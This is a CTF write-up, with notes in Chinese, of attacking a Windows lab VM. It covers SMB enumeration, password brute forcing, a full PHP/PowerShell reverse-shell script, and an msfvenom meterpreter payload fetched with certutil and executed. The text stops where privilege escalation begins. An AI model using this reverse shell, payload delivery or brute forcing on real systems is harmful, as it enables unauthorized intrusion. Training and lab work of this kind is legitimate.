Nmap #
[root@Hacking] /home/kali/Patata
❯ nmap 192.168.26.11 -A
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Curiosidades CTF
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Curiosidades CTF
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
MAC Address: 08:00:27:3D:D6:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 21H2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-30T07:16:27
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: PATATA-MAGICA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:3d:d6:cb (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.26.11
File Read #
进入到80端口这里有一个Games
http://192.168.26.11/juegos.php?file=index.php
可以发现有一个特殊的secret
[root@Hacking] /home/kali/Patata
❯ NetExec smb 192.168.26.11 -u patata -p 00000
SMB 192.168.26.11 445 PATATA-MAGICA [*] Windows 10 / Server 2019 Build 19041 x64 (name:PATATA-MAGICA) (domain:Patata-Magica) (signing:False) (SMBv1:False)
SMB 192.168.26.11 445 PATATA-MAGICA [+] Patata-Magica\patata:00000
SMB #
[root@Hacking] /home/kali/Patata
❯ smbmap -H 192.168.26.11 -u patata -p 00000
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.26.11:445 Name: 192.168.26.11 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
Figuras NO ACCESS Espero alcanzarlos algun dia
IPC$ READ ONLY IPC remota
Secreto READ ONLY jejejeje
[*] Closed 1 connections
有一个Secreto目录可以访问,将里面的东西下载
[root@Hacking] /home/kali/Patata
❯ smbclient //192.168.26.11/Secreto -U patata ⏎
Password for [WORKGROUP\patata]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 24 14:10:31 2025
.. D 0 Sun Aug 24 14:10:31 2025
Banderas.txt A 275 Sun Aug 24 14:10:09 2025
12959816 blocks of size 4096. 5967306 blocks available
smb: \> get Banderas.txt
getting file \Banderas.txt of size 275 as Banderas.txt (89.5 KiloBytes/sec) (average 89.5 KiloBytes/sec)
smb: \> exit
查看内容
[root@Hacking] /home/kali/Patata
❯ cat Banderas.txt
===========================================================
bandera de usuario: dmVyZGFkIHF1ZSB0ZSBlbmdhbmU/
===========================================================
bandera de admin: ZXN0YSB0YW1wb2NvIGVzLi4u
===========================================================#
翻译得出没用,只是干扰项
[root@Hacking] /home/kali/Patata
❯ echo dmVyZGFkIHF1ZSB0ZSBlbmdhbmU/ | base64 -d
verdad que te engane?#
[root@Hacking] /home/kali/Patata
❯ echo ZXN0YSB0YW1wb2NvIGVzLi4u | base64 -d
esta tampoco es...#
User Enum #
[root@Hacking] /home/kali/Patata
❯ NetExec smb 192.168.26.11 -u patata -p 00000 --rid-brute | grep SidTypeUser ⏎
SMB 192.168.26.11 445 PATATA-MAGICA 500: PATATA-MAGICA\Administrador (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 501: PATATA-MAGICA\Invitado (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 503: PATATA-MAGICA\DefaultAccount (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 504: PATATA-MAGICA\WDAGUtilityAccount (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1002: PATATA-MAGICA\www-data (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1003: PATATA-MAGICA\Hacker (SidTypeUser)
SMB 192.168.26.11 445 PATATA-MAGICA 1004: PATATA-MAGICA\patata (SidTypeUser)
Brute Password #
针对这个Hacker用户进行爆破密码
NetExec smb 192.168.26.11 -u Hacker -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
[root@Hacking] /home/kali/Patata
❯ smbmap -H 192.168.26.11 -u hacker -p clifford
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.26.11:445 Name: 192.168.26.11 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
Figuras READ ONLY Espero alcanzarlos algun dia
IPC$ READ ONLY IPC remota
Secreto NO ACCESS jejejeje
[*] Closed 1 connections
Figuras可以访问,下载到三张图片
[root@Hacking] /home/kali/Patata
❯ smbclient //192.168.26.11/Figuras -U hacker
Password for [WORKGROUP\hacker]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Aug 24 15:55:12 2025
.. D 0 Sun Aug 24 15:55:12 2025
Astro.jpg A 15379 Sun Aug 24 15:55:13 2025
Esevka.jpg A 50675 Sun Aug 24 15:54:36 2025
Logo.png A 116897 Sun Aug 24 15:53:26 2025
12959816 blocks of size 4096. 7490350 blocks available
smb: \> mget *
Get file Astro.jpg? y
getting file \Astro.jpg of size 15379 as Astro.jpg (78.6 KiloBytes/sec) (average 78.6 KiloBytes/sec)
Get file Esevka.jpg? y
getting file \Esevka.jpg of size 50675 as Esevka.jpg (437.9 KiloBytes/sec) (average 212.2 KiloBytes/sec)
Get file Logo.png? y
getting file \Logo.png of size 116897 as Logo.png (14269.5 KiloBytes/sec) (average 572.6 KiloBytes/sec)
smb: \> exit
LFI #
没啥思路了,之前有一个uploads目录,源码中有一个提示
[root@Hacking] /home/kali/Patata
❯ curl 'http://192.168.26.11/uploads/'
<!DOCTYPE html>
<html>
<head>
<title>403 Forbidden</title>
</head>
<body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<!--
Tal vez aqui este oculto algo... prueba LFI para verlo
也许这里隐藏着一些东西。..测试LFI以查看
-->
</body>
</html>
扫一下目录
[root@Hacking] /home/kali/Patata
❯ feroxbuster -u 'http://192.168.26.11/' -w /usr/share/seclists/Discovery/Web-Content/common-and-spanish.txt -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.26.11/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/common-and-spanish.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 225l 581w 7539c http://192.168.26.11/juegos.php
200 GET 99l 380w 4241c http://192.168.26.11/index.php
200 GET 69l 395w 3596c http://192.168.26.11/articulos.php
200 GET 99l 380w 4241c http://192.168.26.11/
200 GET 652l 4314w 361553c http://192.168.26.11/favicon.ico
200 GET 99l 380w 4241c http://192.168.26.11/Index.php
403 GET 11l 47w 421c http://192.168.26.11/licenses
200 GET 15l 83w 560c http://192.168.26.11/ajedrez_medieval.txt
200 GET 13l 63w 482c http://192.168.26.11/videojuegos.txt
200 GET 11l 84w 544c http://192.168.26.11/senet.txt
403 GET 11l 47w 421c http://192.168.26.11/phpmyadmin
200 GET 15l 65w 446c http://192.168.26.11/naipes.txt
200 GET 3l 36w 223c http://192.168.26.11/robots.txt
403 GET 11l 47w 421c http://192.168.26.11/server-info
403 GET 11l 47w 421c http://192.168.26.11/server-status
200 GET 58l 245w 3255c http://192.168.26.11/subida.php
301 GET 9l 30w 340c http://192.168.26.11/uploads => http://192.168.26.11/uploads/
503 GET 11l 44w 402c http://192.168.26.11/examples
200 GET 14l 31w 277c http://192.168.26.11/uploads/index.html
[####################] - 9s 14973/14973 0s found:19 errors:0
[####################] - 4s 4987/4987 1218/s http://192.168.26.11/
[####################] - 8s 4987/4987 631/s http://192.168.26.11/cgi-bin/
[####################] - 6s 4987/4987 849/s http://192.168.26.11/uploads/
其中的subida.php可以访问
<?php
set_time_limit(0);
// Obtener IP y puerto de los parámetros GET (si no se envían, usar valores por defecto)
$ip = isset($_GET['ip']) ? $_GET['ip'] : '192.168.101.4';
$port = isset($_GET['port']) ? (int)$_GET['port'] : 5000;
// Validar que la IP y el puerto sean válidos
if (!filter_var($ip, FILTER_VALIDATE_IP)) {
die("IP inválida: " . htmlspecialchars($ip));
}
if ($port < 1 || $port > 65535) {
die("Puerto inválido: " . htmlspecialchars($port));
}
// Crear un archivo .ps1 temporal y ejecutarlo
$psScript = "
\$client = New-Object System.Net.Sockets.TCPClient('$ip',$port)
\$stream = \$client.GetStream()
[byte[]]\$bytes = 0..65535|%{0}
while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){
\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i)
\$sendback = (iex \$data 2>&1 | Out-String)
\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '
\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2)
\$stream.Write(\$sendbyte,0,\$sendbyte.Length)
\$stream.Flush()
}
\$client.Close()
";
// Guardar como archivo temporal
$tempFile = tempnam(sys_get_temp_dir(), 'ps_') . '.ps1';
file_put_contents($tempFile, $psScript);
// Ejecutar el archivo PowerShell
$command = "powershell.exe -ExecutionPolicy Bypass -File \"$tempFile\"";
$output = shell_exec($command . " 2>&1");
// Limpiar archivo temporal (opcional)
unlink($tempFile);
echo "Reverse Shell ejecutada hacia $ip:$port. Verifica tu listener.";
?>
就是一个反弹shell的脚本,需要传入IP和端口
http://192.168.26.11/uploads/revershell.php?ip=192.168.26.3&port=4444
MSF #
查看一下权限信息
PS C:\xampp> whoami /all
INFORMACI?N DE USUARIO
----------------------
Nombre de usuario SID
====================== ==============================================
patata-magica\www-data S-1-5-21-2334922310-1485633714-2262252786-1002
INFORMACI?N DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
=========================================== ============== ============ ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\BATCH Grupo conocido S-1-5-3 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESI?N EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa??a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
LOCAL Grupo conocido S-1-2-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci?n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio alto Etiqueta S-1-16-12288
INFORMACI?N DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci?n Estado
============================= ============================================ =============
SeShutdownPrivilege Apagar el sistema Deshabilitado
SeChangeNotifyPrivilege Omitir comprobaci?n de recorrido Habilitada
SeUndockPrivilege Quitar equipo de la estaci?n de acoplamiento Deshabilitado
SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci?n Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
SeTimeZonePrivilege Cambiar la zona horaria Deshabilitado
其中SeImpersonatePrivilege可以用于Potato系列的提权,这里直接上msf
[root@Hacking] /home/kali/Patata
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.26.3 LPORT=4444 -f exe -o evil.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: evil.exe
[root@Hacking] /home/kali/Patata
❯ pyhttp 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.26.11 - - [30/Aug/2025 21:06:08] "GET /evil.exe HTTP/1.1" 200 -
192.168.26.11 - - [30/Aug/2025 21:06:08] "GET /evil.exe HTTP/1.1" 200 -
另一边下载并且启动
PS C:\temp> certutil -f -split -urlcache http://192.168.26.3/evil.exe
**** En l?nea ****
0000 ...
1c00
CertUtil: -URLCache comando completado correctamente.
PS C:\temp> .\evil.exe
直接尝试提权
